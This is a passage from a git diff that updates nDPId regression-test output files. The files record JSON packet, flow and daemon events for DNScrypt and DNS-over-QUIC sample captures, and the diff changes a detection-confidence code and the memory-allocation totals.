HoRtfYQolh6A5Hcjo\/jY6K8WK9AYDN4oGnBq2Zj4\/\/kX6Io7WhFljPtCYlDuu6c2DaooeLWfDA4aiTOc
gajr55j+xPLf7QCmTIPnSNaljtC8eAv2zKtaHTOxfqBnVS2qgCianNYsfZKJnMugiHwOoaiJRwFh7pRkLQHsaRmUwL7vL3V61gMAYHLFcSc9eFMEELE0f\/ZCqihiDw76bxMzGRDmA2k1dv1pc9dZ99Ue\/PDqBzsXDzW0KYkSPi3FTRTVCcb3S1zt0x0i8Xn8a9DcLUqsCeFC+tn1mb0dgeRDdkXiH6Q6fSweEw2PTotOKU\/j9hJM680iuH5tTNwSeded2TpAJ0+s\/qihZjedAPyx6rLEqze3DvE7LdsxMHpTPE+MsP5MLsZXG4gnX+29YRCkNE3C55pGXwdkjw9WH9Kilh0MC0xfYccaNmVdRLqWcpDKmsXOheBIMt\/4erfzigzbscKLMVmi73r5KGkOYVsW04yU067zltq+0GH3UBPFcd61oBOkbsGPO4r1UmBlHZJoz0lwKh1rV3nPuBv46M4MKI6eSRqOL4FFePLAO7NiaYa+o="} 00938{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946760605298,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":410,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":410,"pkt_l4_len":376,"thread_ts_msec":946760605298,"pkt":"6qmpVXFVLGv1oHfACABFAAGMP3pAADYR4Ix\/AAACfwAAARTpxs0BeEafcjZmbnZXajgMNKrUz4BH5JtgTO\/vSxmsaEEZ\/CAi1tHviASLJ0uizAKXOLABetwgqhCo5m4k1iiphPsQtmERIqMf5JqXqiSdLy1Ba297cOraSOTaFHJWit3rzIV3AowJFomZ6bNGgpjxuYxUP4ApyAtzXYDJCYeu\/TSh4Op6+VkA6r1rjj0eFvuUrgX0XUc9PplmByW+parwj6z4sTPvV7M24c3XCf31OpXMDgENn0dC\/NtCYAPIhFy5yJH4NN0uv+wCzBvfx5hamAafH0ucNQEWgtIToY\/UKfIcB1p2Rmxkik4bx1XvJZRpgatWlKpSSZ2osdUqE0Gf6dev8q1ZEmaD+Nt91oo9gqW7UnB\/A+rnjMC7Jl4QB0mRDv3NPjcpvDGjZgxCT\/Cm8FWDlE6PMnj9qJUAbU8j4wyOOwo1LdjYHrXav+2Cx6qKLtaO9UmFpkeQ1L0Y\/fU\/6vod5MZsIE9xe3xRC2JrvS8Zsa2Q5fU="} 
-00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605285,"flow_last_seen":946760605298,"flow_idle_time":200000,"flow_min_l4_payload_len":368,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1456,"flow_avg_l4_payload_len":728,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":50893,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760521313,"flow_last_seen":946760521327,"flow_idle_time":200000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1328,"flow_avg_l4_payload_len":664,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":38650,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946760605202,"flow_last_seen":946760605216,"flow_idle_time":200000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":1088,"flow_tot_l4_payload_len":1264,"flow_avg_l4_payload_len":632,"midstream":0,"thread_ts_msec":946760605298,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.2","src_port":42883,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"dnscrypt-v2.pcap","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":4048,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":946760605298} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -24,9 +24,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871737 bytes -~~ total memory freed........: 5871737 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6005371 bytes +~~ total memory freed........: 6005371 bytes +~~ total allocations/frees...: 120890/120890 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 467 chars ~~ json string max len.......: 1924 chars diff --git a/test/results/dnscrypt_skype_false_positive.pcapng.out b/test/results/dnscrypt_skype_false_positive.pcapng.out index 26733e6c4..3eeb83025 100644 --- a/test/results/dnscrypt_skype_false_positive.pcapng.out +++ b/test/results/dnscrypt_skype_false_positive.pcapng.out 
@@ -5,9 +5,9 @@ 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625015363881,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1625015363881,"pkt":"YDjgxTWgeJS0JASgCABFAAEMb2FAADQRWrvUL+SIwKgCZAG7twoA+ISncjZmbnZXajh5YQcRfsUXF5uDrnRgM\/W0etYbRlCvzAlkKKyMUQLv0ljsGjvVtZfe\/2tl\/VnemuvYfUBk\/FlJZG2T9aqA3YLF1UTRltK97uI2ksWKJgX3BniRDpntrFamW1JEmb\/3xLyET8LVaXWh0WE97YtyY5BJWfj3a3nIABAcBULeLr+9m6kab1t2+yUw8O2x9jiPjOG9E0ybqrKAE6AYHqZ5TwJfUOjYj\/lXF7jHkO1u0hdfTacv4XB0pSOO1yv7woMURQKedSBCZ47xfNaXXx66LiGW4zFY9AWDuJNy+t3jJfjPP44rub81jFTM"} 00573{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":3,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","packets-captured":3,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":752,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":6,"global_ts_msec":1625020200938} 
01154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1625020200938,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":1625020200938,"pkt":"eJS0JASgYDjgxTWgCABFcAIcvZMAAIwR8wjAqAJk1C\/kiLcKAbsCCH3e0xsCBCrEBvNJfmmTQksKFsBudVhmUbtKR7UA4dAhr2YeFsWFn50WD0vHrlH\/yRcXvmd7t8+K4M4sVr0Poj8Wk\/utpL\/xCX\/xF62azc12+nNI8QCtVvppS8TlqEq0v0z1ZL6VhUUGpPUFklJ6FIusCvwq2w1dSM6BMePG+Qo4lcOLbOLpFDdDpN7sGyBBByiu62SvizwpJiQ6P3\/ZSXKjnk+4TGpUh1Mb5c9mzEfAV3qGGdzKjeCok93Nwnvp36CiiO\/GOkE9r\/ZYsdRaCmC23bIy9acHKaDgHPfJpiFe0JUanQLCN9xYimCEsH8Zta9Ub1Y03R23fJnK8tpwkYIEBK7LZJ1F9iJoeKxBWFnz1ecGcBI1RX2es6McfzJoxkjQOuHEH6AiYPJoSwpKAve4ipq0HR\/HOtcm2eSvFhLdYG1E+T0mXDh9vYgTW5nrseVIT7nqhIq7lD3WYEFzszkgcd3k9UDRv+myTHfgeMeOMZENFmbm5E8g9X\/DmfsUhaGuiUNClJJMVj7goJjiEWrKvyoRVfrCC4PbNLMbvqDrlvRzXORnY\/CFgO7+WLg3KO2ey7CthW2BKxwYRE712SYEdOkDCt96TjkrXI1srSS+8m95DCo5Kt+A80OCrLXxvwtGpEmk4P+Hhi7NqGvVAPLHH8VQvEse4iqUK05\/zGpQspc="} -00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
-00707{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} -00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1625015363846,"flow_last_seen":1625020500975,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":2128,"flow_avg_l4_payload_len":354,"midstream":0,"thread_ts_msec":1625020500975,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00707{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":5,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1625015363846,"flow_last_seen":1625020200970,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1376,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1625020200970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1625015363846,"flow_last_seen":1625020500975,"flow_idle_time":200000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":2128,"flow_avg_l4_payload_len":354,"midstream":0,"thread_ts_msec":1625020500975,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"212.47.228.136","src_port":46858,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00577{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":6,"source":"dnscrypt_skype_false_positive.pcapng","alias":"nDPId-test","packets-captured":6,"packets-processed":6,"total-skipped-flows":0,"total-l4-payload-len":2128,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":1,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1625020500975} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 6/6 @@ -17,9 +17,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869617 bytes -~~ total memory freed........: 5869617 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6003251 bytes +~~ total memory freed........: 6003251 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 487 chars ~~ json string max len.......: 1159 chars 
diff --git a/test/results/doq.pcapng.out b/test/results/doq.pcapng.out index ca10fad7e..58458ae06 100644 --- a/test/results/doq.pcapng.out +++ b/test/results/doq.pcapng.out 
@@ -2,16 +2,16 @@ 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1606056093199} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1606056093199,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1606056093199,"pkt":"AAAAAAAAAAAAAAAAht1gJqqiBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAButIDEATYBOvN\/wAAIAhwsYltsps+WghOL+O5iCYx+QBEtgiJINLAj38+CB9CqAWNGDJ\/Ht0GdZPYPfPv0gkn+G7KypaOwXpeaLqP2vrcKno6\/xJHt9kjbL2TY4b\/m9R6nztt0oBs85JJhS7Tj\/KxdnJUR5x1KoMSoiK8Up0wKQjS6CJwz+096+5cglByj68BpzrUHMPeI6GM8BR\/Wl2qjunMufbT3ODI125lDdGTaTqNLCMEIjagI12Vrkh1+4q55QnPNmDSc9uNkJ0l5bhH58Gr3GA8HfFg35RCENcGDFpWMYVXiM4ZLQRFPmW9PqqUvAkPFdK1\/e6zKceMIWl6qFwaRZM+da6dEGVcJjr7Z+tAEETRp6uqCb9nnpAvg2AYmEND50nvVEnJ0vebAvnDE4IogXJzua2gFwFm7VLYd1uL79o4iJgu\/rwI3t1+Scpc6iAB46mZWFz3fE1WDQxwSMiil9o8+U4JW1BkjaBlJjEwDLig1LbtT\/HP47m8JDRgq00wdO+B2e1saSoPUtzWH02fRpSsRwHLssxWK\/GeM8n4na9wb14wVoOdjdGJ+KEHpdBBYTSNse3PnwWrKaaP0mh7odZYLBlgeNvTBLAUy7TPWKcxmhtN6bsS\/Yjh2568CzWxz8tWmprG6YblEP1vhUU2WDKbQBSh9+e7EH2JaN6LGpgUM6\/yeDE+g\/QCDKFbnXJHaC3VNe2EpDTrUSTzTJX2ScnDPI4dI01EvvWXSfxAJzcCmkKAUz3B\/F3DS8bS2lYESb9nSox1FCQUX1S8MhWCL4jSZ4wobqLA6VEQ7puZt\/yd5mc0snO7+JferPZwSQV1jN5hdBcuNb6kj\/JG4pzUoB7QTPQcjcnBLCPQDWDzw3nQ+Ebywtgt9T0aEFqJVOTfT95bWTz6VinV\/brwfnTHpSbkUgeBvFyaDcSzRz5tFZ0q4\/gUbfajms9qKrPFsufIU5NQtKyl5gUxP+4xC0KsglyEqg4DVy8vzlOpHC9Zo8AzpD2Cd9yZUaVpS3jLxre91YlfpTBViFMhAAL1N+wl47YhA2pgyB2GGbWg1O6K4C74tiA9XM\/lrGlbtuiyqqRmlQ+OfACiiCT0\/fwnridhEP9NjW3A9LNkp5ph6u81Z1emHsIGmFkXyP7nojGy2XKkTHlNA+eKBGol\/TUgCzHu7qPwHu5vMLlk5NNq3Od8+eHViQU1LY+OXeYFHuY2S+VSf848yXn0P1WZ\/Hf4jpB8WMcPpj0cXHyY46IsajmZ4uRB40h68eDc26RMlrZAfwBIGjks8KSh5b2f1BdJ6LJ4taZkNl8x+qPVYwRdc+lJsRkcGfu+BxMBIzhOPr2wg8uauRqGpIMGiSEXt5eLhu3VHEqTuhLQrFWRwEWEm+WzY4itmVZYx3CM7zWu6j3KhN5W5HEWKe61AmbunEuzKrb9KKf1hG4Uz72IU4aUy8+qV8fLyqPe7E\/Hm\/QiosHbq0whMHw6xHc0E9dDFb7\/w2jqW\/bhRCLrrZSTu8KDShAe9bke
mwaFOWgs8zleXJrozrnvcOKNBpToZAop8FcA1V6SZ+05avECZK7qQ04Uc8xlehoG+3W27ZNgeNIiTH8MtU0A5kV6veOOCPQW7GGwaBK9iuORoisN7YKGMwzzN0ZIQ\/IailJpjg=="} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1606056093199,"flow_last_seen":1606056093199,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1606056093199,"l3_proto":"ip6","src_ip":"::1","dst_ip":"::1","src_port":47826,"dst_port":784,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"version":"TLSv1.3","alpn":"doq-i00","ja3":"c0ce40fbb78cbf86a14e6a38b26d6ede","tls_supported_versions":"TLSv1.3,TLSv1.3 (draft),TLSv1.3 (draft),TLSv1.3 (draft)"}} 
02139{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"doq.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1606056093201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1606056093201,"pkt":"AAAAAAAAAAAAAAAAht1gJPSDBNgRQAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAxC60gTYBOvN\/wAAIAhOL+O5iCYx+Qi72eOch5MP7QBAnCxpB\/ZzHhatBCMXwxT8fSrL9Wdt\/ZFOXhnvUbk6DdAuuzdAXxro6AjNqIcuTb2Re8BepV9SRKgSpP5M7LrQffcZ9shmrS20KZKb\/ztrJeGi\/T\/Srzlr49oBUZ5XMUOjcM7DeI6CgL+ZkO5L8gOV4+8ueGIUub0wiW6+Jof5086V6cR2hj9bBsTK6z5+hag0bw2HYNhsBUUI567S6uj\/AAAgCE4v47mIJjH5CLvZ45yHkw\/tRAEwp7WGjD8jV9zAfZPHhqQ1G3rU1wu59XApa\/uBCBj\/P3rsDGNWqlRQj5q2CQMAtwoaVW5R4D\/leJG\/QScVoSAiDmPCSxR8YrHk5Y7hGxh+CuYKI4vAFyF29Gcm7XH58xSv+Y0je37cyhm71z7xP4G24oT+neWXAiCImQb8UPinjOVju\/1ZXWChdKepJDE+EqJTk8BoOpF9LvyXj5n733Xph2u5IJ\/p\/3foWmTC0fAjiMQ12dhZ6KIFgHDWW0UYsYoYGxC75AmqEL4W0ZygLN4Jp+zSt6jJsE6uSWjtu9Mwx8zRmpzIUbk2rS\/lIYNH+L8sZitAI\/mAouO1FzaXzIPuVV15eTfM\/D4HfHtnBqU5JIgEq30fGDU8vQEvr9VcBwpWT5O0sL5kG6g3W7z970vBsvCXzENm+QLPGXr10ns2jeQncf3V0s9pvLk2K4TGX8jm5gNEpFEQC6sid28q4Y5Bk2mCdnHt7MFfqeIQtVf6U3jEBxXtqNwnbDuTXuCGC9PAu0Ie4j3YiB88cN+EoNanC8QpOjA3mDQP6RbMKMlxgNT1GCSYoSSr70l\/p2Vp0WohDZeycXBsQ9txnWshMbiCp8imTkzhOWSmVNhhzqZOyuIxBEnqW6hAlYSRGGlQym+AFEpgzsjqJLjzqOLeESR5tBel8x5HwEzLLqVaja5Udf5uBnGJUVNub2RGOPiMMnZCl+iL2LRMiCHUoBDmvimDtRLtAOt2SNvH93OMwXA\/IyIrY+XO56T3mS1YSU9Ydwn6d5ywddheaImd1U\/vJ57ZtUSbUvf+DXuTp09bwzrY9tw5NZDPH\/iljKwqemZHmirnsyyz4OUNANR+9\/kuYPx2d\/ZS7953Z8P\/sqzOE3LjEyoUSRCXVL4XoEkGM23PQQcDudByAaZ+9LTgkgxPTKnHgpxcDQowxdEx+BnESQ9DwSJQM7+xTAOPC9sMDrzuSInM7z5AK+Pqrk4B2Vwy+rXo798A5XjeZBrTkCt8XwQLpXhtqaRjTnFTN9kHqTE4fN2bwWBueF8sdBSZ3aK2MK9uuf3XfveW2fg\/1tyeU\/EXgKHtRL55w3iVM91ZMotsrGhoYdGkE7MCdncoh54jfxD5eJPuIFA4F254QXkd2ttFid3O1xFmVbRo9jbjk7d2+6yRzPkKLtyJyptApw6QxkBCFBxcnQA+oUEGOkjoCUtqGfeqRlTptqqqHIGzgHL7YafvSlJW897JYtCkXn4
